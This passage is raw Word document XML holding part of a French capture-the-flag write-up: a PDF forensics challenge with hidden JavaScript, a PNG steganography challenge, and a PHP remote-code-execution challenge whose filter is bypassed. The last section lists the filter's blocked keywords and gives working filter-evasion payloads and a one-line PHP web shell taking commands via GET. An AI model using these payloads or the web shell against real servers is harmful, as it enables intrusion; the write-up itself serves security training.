    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On remarque la présence d’un objet de type Javascript, on l’exporte avec pdf-parser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>swissky@crashlab:~/Bureau/ESE Forensic 1/Outils Resolution$ python pdf-parser.py --search=javascript Challenge.pdf</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/JS (  /*01110110011000010111001000100000011000010011110100100111011001010111* /)</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pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>/*01111011101110011001101110010010111110100000000100111001110110010000001110110011000010111001000100000011001010011110100100111011101000101111100110011010000010100110101111101* /)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Des 0 et 1 apparaissent dans des commentaires JS, on les concatène pour obtenir un binary string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>011101100110000101110010001000000110000100111101001001110110010101110011001001110011101</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 10011010000010100110101111101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Cela nous donne un code Javascript, on l’execute dans une console JS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>var a='es';var b='e{E1f';var c='f3l_T'; var d='ow3r_@'; var e='t_3AM}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>console.log(a+b+c+d+e)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Le résultat nous donne le flag : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{E1ff3l_Tow3r_@t_3AM}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>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9" w:name="_Toc1516663917"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>MISC 150 - Wow stegano</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>On récupère une image au format PNG que l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’on analyse afin d’obtenir quelques informations supplémentaires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>swissky@crashlab▸ ~ ▸ $ -file ‘ESE Stega.png‘</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ESE Stega.png: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PNG image </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>data, 300 x 300, 8-bit/color RGBA, non-interlaced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On lance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">stegsolve </w:t>
      </w:r>
      <w:r>
        <w:t>pour mettre en évidence d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’éventuelles informations dans les Low Signicative Bits.</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java -jar Stegsolve.jar </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">En parcourant les différentes frames on découvre un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">QrCode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">dans la couche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alpha.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3670300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>883285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="657225" cy="471170"/>
                <wp:effectExtent l="12700" t="12700" r="15875" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Right Arrow 21"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2780030" y="5197475"/>
                          <a:ext cx="657225" cy="471170"/>
                        </a:xfrm>
                        <a:prstGeom prst="rightArrow">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3" type="#_x0000_t13" style="position:absolute;left:0pt;margin-left:289pt;margin-top:69.55pt;height:37.1pt;width:51.75pt;z-index:251700224;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#7A6A60 [3206]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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BbSTjraAAAACwEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIU&#10;ABQAAAAIAIdO4kBgatyUYwIAAMgEAAAOAAAAAAAAAAEAIAAAACkBAABkcnMvZTJvRG9jLnhtbFBL&#10;BQYAAAAABgAGAFkBAAD+BQAAAAA=&#10;" adj="13858,5400">
                <v:fill on="t" focussize="0,0"/>
                <v:stroke weight="2pt" color="#584C44 [3206]" joinstyle="round"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1600835</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>864870</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="657225" cy="471170"/>
                <wp:effectExtent l="12700" t="12700" r="15875" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="20" name="Right Arrow 20"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2780030" y="5148580"/>
                          <a:ext cx="657225" cy="471170"/>
                        </a:xfrm>
                        <a:prstGeom prst="rightArrow">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="2">
                          <a:schemeClr val="accent2">
                            <a:shade val="50000"/>
                          </a:schemeClr>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:schemeClr val="accent2"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:schemeClr val="accent2"/>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3" type="#_x0000_t13" style="position:absolute;left:0pt;margin-left:126.05pt;margin-top:68.1pt;height:37.1pt;width:51.75pt;z-index:251678720;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#CC8E60 [3205]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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AS4YFI2gAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAU&#10;AAAACACHTuJAzzGhR2ECAADIBAAADgAAAAAAAAABACAAAAApAQAAZHJzL2Uyb0RvYy54bWxQSwUG&#10;AAAAAAYABgBZAQAA/AUAAAAA&#10;" adj="13858,5400">
                <v:fill on="t" focussize="0,0"/>
                <v:stroke weight="2pt" color="#956744 [3205]" joinstyle="round"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1581150" cy="221932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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1581150" cy="2219325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1552575" cy="22288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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1552575" cy="2228850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1590675" cy="220027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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1590675" cy="2200275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On obtient le flag en le decodant avec un smartphone ou sur des sites spécialisés : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>se{St1ll_LSB_1n_2k16}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc1708836596"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>MISC 250 - Outsmarter filter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3964940</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>194310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1900555" cy="1381125"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1900555" cy="1381125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>L'énonce nous indique que nous devons réaliser une RCE pour valider l'épreuve mais qu'un filtre est présent. Le filtre recherche :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>- Texte de moins de 42 caractères</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>- Banissement des mots clefs : eval shell exec popen php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>- Banissement des opérateurs : ? et ; et $</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On va essayer d'injecter du code PHP pour faire notre RCE, nous testons un simple :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;?php echo "test"; ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le filtre détecte nos "?", ";" et "php". Après avoir regardé la documentation on apprend qu'il est possible de remplacer &lt;?php par</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;script language=php&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>, on est débarrassé de nos "?" mais de notre "php". Et si le script n'était pas sensible à la casse ? On teste notre payload avec "PHP"</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'Hello'&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">   taille : 42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Celui-ci s'execute, nous avons donc passé la première partie du challenge, nous sommes capable  d'injecter des commandes PHP. Il nous faut maintenant trouver le flag, la première idée est de lister les fichiers et dossiers. On essaie donc un appel à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>car il n'est pas bloqué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language=PHP&gt;system('ls')&lt;/script&gt;     taille :  42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le script fonctionne mais on n'obtient rien d'interesssant, on essaie d'afficher les fichiers cachés</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language=PHP&gt;system('ls -a')&lt;/script&gt;     taille :  45</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Malheureusement notre payload est trop grand 45 caractères alors que la limite est de 42..Il nous faut trouver un moyen de le réduire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Après quelques recherches sur "Mini Shell PHP", on trouve celui-ci : &lt;?=@`$_GET[c]`; Il n'est pas adapté à cause de ses ";" et "?" mais on va le modifier pour l'utiliser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explication du shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;?=@`$_GET[c]`;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">   |   |     |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">   |   |</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> ------&gt; Execute la commande système grace aux backticks : http://php.net/manual/en/language.operators.execution.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">   |   ------------&gt; Récupère une commande par GET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">   ----------------&gt; Enleve les erreurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On peut donc remplacer system('ls') par echo `ls`. Notre payload devient donc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`ls`&lt;/script&gt;     taille : 39</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Parfait la taille est respectée mais on a toujours pas de fichier intéressant. Nous voulons alors inspecter le contenu d'index.php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`cat index.php`&lt;/script&gt; taille 50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>La taille de notre script est trop grande, on le réduit encore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`cat i*`&lt;/script&gt;  taille 43</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`cat *`&lt;/script&gt;   taille 42</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language=PHP&gt;echo`cat *`&lt;/script&gt;    taille 41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Le contenu des fichiers s'affiche, on peut voir le flag dans index.php “Well done, you found the flag : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{RCE_4ll_th3_dummy_WAFs}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
